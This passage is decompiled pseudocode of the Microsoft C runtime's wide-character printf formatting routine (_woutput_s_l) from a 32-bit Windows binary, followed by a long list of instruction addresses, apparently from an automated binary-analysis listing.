    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x49c) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x49c) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x49c) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L167;
    																			}
    																			goto L163;
    																		}
    																	case 0xd:
    																		goto L0;
    																	case 0xe:
    																		while(1) {
    																			L187:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L212;
    																			}
    																			goto L188;
    																		}
    																}
    															case 8:
    																L24:
    																__ecx =  *(__ebp - 0x10);
    																__ecx =  *(__ebp - 0x10) | 0x00000002;
    																 *(__ebp - 0x10) = __ecx;
    																goto L27;
    															case 9:
    																L25:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																goto L27;
    															case 0xa:
    																L23:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																goto L27;
    															case 0xb:
    																L22:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																goto L27;
    															case 0xc:
    																L26:
    																__eax =  *(__ebp - 0x10);
    																__eax =  *(__ebp - 0x10) | 0x00000008;
    																__eflags = __eax;
    																 *(__ebp - 0x10) = __eax;
    																goto L27;
    															case 0xd:
    																L27:
    																goto L214;
    														}
    													} else {
    														_t517 = 0;
    														if(0 == 0) {
    															 *(_t525 - 0x4dc) = 0;
    														} else {
    															 *(_t525 - 0x4dc) = 1;
    														}
    														 *(_t525 - 0x46c) =  *(_t525 - 0x4dc);
    														if( *(_t525 - 0x46c) == 0) {
    															_push( &M00B77C38);
    															_push(0);
    															_push(0x460);
    															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    															_push(2);
    															_t498 = L00B7D760();
    															_t527 = _t527 + 0x14;
    															if(_t498 == 1) {
    																asm("int3");
    															}
    														}
    														L14:
    														if( *(_t525 - 0x46c) != 0) {
    															goto L16;
    														} else {
    															 *((intOrPtr*)(L00B80C60(_t510))) = 0x16;
    															E00B809F0(_t501, _t510, _t523, _t524,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    															 *(_t525 - 0x4c8) = 0xffffffff;
    															E00B7C650(_t525 - 0x40);
    															_t483 =  *(_t525 - 0x4c8);
    															L225:
    															return E00B805D0(_t483, _t501,  *(_t525 - 0x48) ^ _t525, _t517, _t523, _t524);
    														}
    													}
    												}
    												L215:
    												__eflags =  *(_t525 - 0x45c);
    												if( *(_t525 - 0x45c) == 0) {
    													L218:
    													 *(_t525 - 0x4f8) = 1;
    													L219:
    													_t517 =  *(_t525 - 0x4f8);
    													 *(_t525 - 0x4bc) =  *(_t525 - 0x4f8);
    													__eflags =  *(_t525 - 0x4bc);
    													if( *(_t525 - 0x4bc) == 0) {
    														_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    														_push(0);
    														_push(0x8f5);
    														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    														_push(2);
    														_t488 = L00B7D760();
    														_t527 = _t527 + 0x14;
    														__eflags = _t488 - 1;
    														if(_t488 == 1) {
    															asm("int3");
    														}
    													}
    													__eflags =  *(_t525 - 0x4bc);
    													if( *(_t525 - 0x4bc) != 0) {
    														 *(_t525 - 0x4d4) =  *(_t525 - 0x44c);
    														E00B7C650(_t525 - 0x40);
    														_t483 =  *(_t525 - 0x4d4);
    													} else {
    														 *((intOrPtr*)(L00B80C60(_t502))) = 0x16;
    														E00B809F0(_t501, _t502, _t523, _t524, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    														 *(_t525 - 0x4d0) = 0xffffffff;
    														E00B7C650(_t525 - 0x40);
    														_t483 =  *(_t525 - 0x4d0);
    													}
    													goto L225;
    												}
    												L216:
    												__eflags =  *(_t525 - 0x45c) - 7;
    												if( *(_t525 - 0x45c) == 7) {
    													goto L218;
    												}
    												L217:
    												 *(_t525 - 0x4f8) = 0;
    												goto L219;
    											}
    										}
    										L184:
    										__eflags =  *(__ebp - 0x24);
    										if( *(__ebp - 0x24) == 0) {
    											L186:
    											 *(__ebp - 4) =  *(__ebp - 4) - 1;
    											 *(__ebp - 4) =  *(__ebp - 4) - 1;
    											__eax =  *(__ebp - 4);
    											 *( *(__ebp - 4)) = 0x30;
    											__ecx =  *(__ebp - 0x24);
    											__ecx =  *(__ebp - 0x24) + 1;
    											__eflags = __ecx;
    											 *(__ebp - 0x24) = __ecx;
    											goto L187;
    										}
    										L185:
    										__eax =  *(__ebp - 4);
    										__ecx =  *( *(__ebp - 4));
    										__eflags = __ecx - 0x30;
    										if(__ecx == 0x30) {
    											goto L187;
    										}
    										goto L186;
    									}
    									L180:
    									__eax =  *(__ebp - 8);
    									asm("cdq");
    									__ecx =  *(__ebp - 0x4a4);
    									__edx =  *(__ebp - 0x4a8);
    									__eax = E00B855B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
    									 *(__ebp - 0x494) = __eax;
    									__eax =  *(__ebp - 8);
    									asm("cdq");
    									__eax =  *(__ebp - 0x4a4);
    									__ecx =  *(__ebp - 0x4a8);
    									 *(__ebp - 0x4a8) = E00B85630( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
    									 *(__ebp - 0x4a4) = __edx;
    									__eflags =  *(__ebp - 0x494) - 0x39;
    									if( *(__ebp - 0x494) > 0x39) {
    										__edx =  *(__ebp - 0x494);
    										__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
    										__eflags = __edx;
    										 *(__ebp - 0x494) = __edx;
    									}
    									__eax =  *(__ebp - 4);
    									 *( *(__ebp - 4)) =  *(__ebp - 0x494);
    									 *(__ebp - 4) =  *(__ebp - 4) - 1;
    									 *(__ebp - 4) =  *(__ebp - 4) - 1;
    									L178:
    									__ecx =  *(__ebp - 0x30);
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) > 0) {
    										goto L180;
    									}
    									goto L179;
    								}
    							}
    							L165:
    							__eflags =  *(__ebp - 0x4a0);
    							if( *(__ebp - 0x4a0) >= 0) {
    								goto L167;
    							}
    							goto L166;
    							L167:
    							__ecx =  *(__ebp - 0x4a0);
    							 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
    							__edx =  *(__ebp - 0x49c);
    							 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
    							goto L168;
    						}
    					}
    				}
    			}













    0x00b96a89
    0x00b96a89
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00000000
    0x00b96bc9
    0x00b96bc9
    0x00b96bd4
    0x00b96bda
    0x00b96bdc
    0x00b96be2
    0x00b96be5
    0x00b96be7
    0x00b96bed
    0x00b96bf6
    0x00b96bfb
    0x00b96c18
    0x00b96c1b
    0x00b96c1b
    0x00b96c20
    0x00b96c25
    0x00b96c25
    0x00b96c2b
    0x00b96c2d
    0x00b96c33
    0x00b96c39
    0x00b96c39
    0x00b96c42
    0x00b96c42
    0x00b96c2b
    0x00b96c48
    0x00b96c4c
    0x00b96c5a
    0x00b96c5d
    0x00b96c60
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c76
    0x00b96c76
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c85
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9a
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96c9e
    0x00b96ca4
    0x00b96ca4
    0x00b96caa
    0x00b96d27
    0x00b96d2d
    0x00b96d30
    0x00b96d33
    0x00b96d36
    0x00b96d39
    0x00b96d3f
    0x00b96d3f
    0x00b96d45
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00b96d7a
    0x00b96d7d
    0x00b96d7d
    0x00b96d80
    0x00b96d85
    0x00b96d85
    0x00b96d8a
    0x00b96da1
    0x00b96da1
    0x00b96da4
    0x00b96dbb
    0x00b96dbb
    0x00b96dbe
    0x00b96dc0
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd3
    0x00b96dd6
    0x00b96dd9
    0x00b96de2
    0x00b96de2
    0x00b96de5
    0x00b96de7
    0x00b96dee
    0x00b96df2
    0x00b96dfb
    0x00b96e00
    0x00b96e03
    0x00b96e0a
    0x00b96e0e
    0x00b96e12
    0x00b96e1e
    0x00b96e21
    0x00b96e21
    0x00b96e24
    0x00b96e29
    0x00b96e29
    0x00b96e2c
    0x00b96e2e
    0x00b96e35
    0x00b96e39
    0x00b96e42
    0x00b96e47
    0x00b96e2c
    0x00b96e4a
    0x00b96e4e
    0x00b96f08
    0x00b96f08
    0x00b96f0f
    0x00b96f13
    0x00b96f17
    0x00b96f1b
    0x00000000
    0x00b96e54
    0x00b96e54
    0x00b96e54
    0x00b96e58
    0x00000000
    0x00000000
    0x00b96e5e
    0x00b96e5e
    0x00b96e61
    0x00b96e67
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e70
    0x00b96e7c
    0x00b96e7f
    0x00b96e85
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e89
    0x00b96e8c
    0x00b96e92
    0x00b96e9a
    0x00b96e9c
    0x00b96ea3
    0x00b96eaa
    0x00b96eb9
    0x00b96ebf
    0x00b96ec6
    0x00b96ed4
    0x00b96ed4
    0x00b96edb
    0x00b96ee7
    0x00b96ef5
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f23
    0x00b96f2a
    0x00b96f2f
    0x00b96f2f
    0x00b96f32
    0x00b96f34
    0x00b96f3b
    0x00b96f48
    0x00b96f4d
    0x00b96f32
    0x00b96f2a
    0x00b96f50
    0x00b96f50
    0x00b96f54
    0x00b96f58
    0x00b96f5c
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b96236
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962c6
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b96327
    0x00b9632a
    0x00b96354
    0x00b96357
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633b
    0x00b9633f
    0x00b96341
    0x00b96344
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00b96368
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96380
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96394
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963d8
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b9642f
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b9645f
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648c
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b96497
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a2
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964ad
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964b8
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c3
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646b
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643b
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b963ff
    0x00b96402
    0x00b9641b
    0x00b9641e
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e6
    0x00b964e9
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b9651a
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b96537
    0x00b9653d
    0x00b9653f
    0x00b96542
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b9667d
    0x00b96682
    0x00b96684
    0x00b96687
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00000000
    0x00000000
    0x00b965e4
    0x00b965e4
    0x00b965f0
    0x00b965f6
    0x00b965fd
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96614
    0x00b96620
    0x00b96675
    0x00000000
    0x00b96675
    0x00b965ff
    0x00b965ff
    0x00b96605
    0x00b96609
    0x00b96628
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00000000
    0x00b9662e
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e2
    0x00b968e6
    0x00b968f1
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b96946
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c3
    0x00b969c8
    0x00b969ca
    0x00b969ce
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969ce
    0x00b969f1
    0x00b969f8
    0x00b969fb
    0x00b96a00
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a2e
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a3e
    0x00b96a41
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96d70
    0x00b968f7
    0x00b968f7
    0x00b968fe
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96565
    0x00b96568
    0x00b965c1
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965ac
    0x00b965b4
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00000000
    0x00b96a5b
    0x00b96a5e
    0x00b96a61
    0x00b96a64
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b967ba
    0x00b967ba
    0x00b967c6
    0x00b967cc
    0x00b967d1
    0x00b967d3
    0x00b9687d
    0x00b9687d
    0x00b96880
    0x00b96880
    0x00b96883
    0x00b96897
    0x00b9689d
    0x00b968a3
    0x00b96885
    0x00b96885
    0x00b9688b
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00b967d9
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b967ff
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96823
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96829
    0x00b96830
    0x00b96878
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00000000
    0x00b9686d
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ace
    0x00b96ad4
    0x00b96ad6
    0x00b96ad9
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
    0x00b96bbe
    0x00000000
    0x00000000
    0x00000000
    0x00b96bbe
    0x00000000
    0x00b96a76
    0x00b96a76
    0x00000000
    0x00000000
    0x00b9668d
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96785
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96792
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967a7
    0x00b967ad
    0x00b967ad
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b966fb
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670c
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b96723
    0x00b9672b
    0x00b9672d
    0x00b9672f
    0x00b96735
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966ef
    0x00b966f2
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00000000
    0x00b96d74
    0x00b96d70
    0x00000000
    0x00b96a6d
    0x00b96a6d
    0x00b96ae2
    0x00b96ae2
    0x00b96ae5
    0x00b96ae5
    0x00b96aea
    0x00b96b0c
    0x00b96b0c
    0x00b96b12
    0x00b96b34
    0x00b96b34
    0x00b96b37
    0x00b96b7e
    0x00b96b7e
    0x00b96b81
    0x00b96b9e
    0x00b96ba2
    0x00b96baa
    0x00b96baa
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b83
    0x00b96b87
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3c
    0x00b96b3f
    0x00b96b5d
    0x00b96b69
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b41
    0x00b96b45
    0x00b96b4d
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b14
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96aec
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbb
    0x00b96bbb
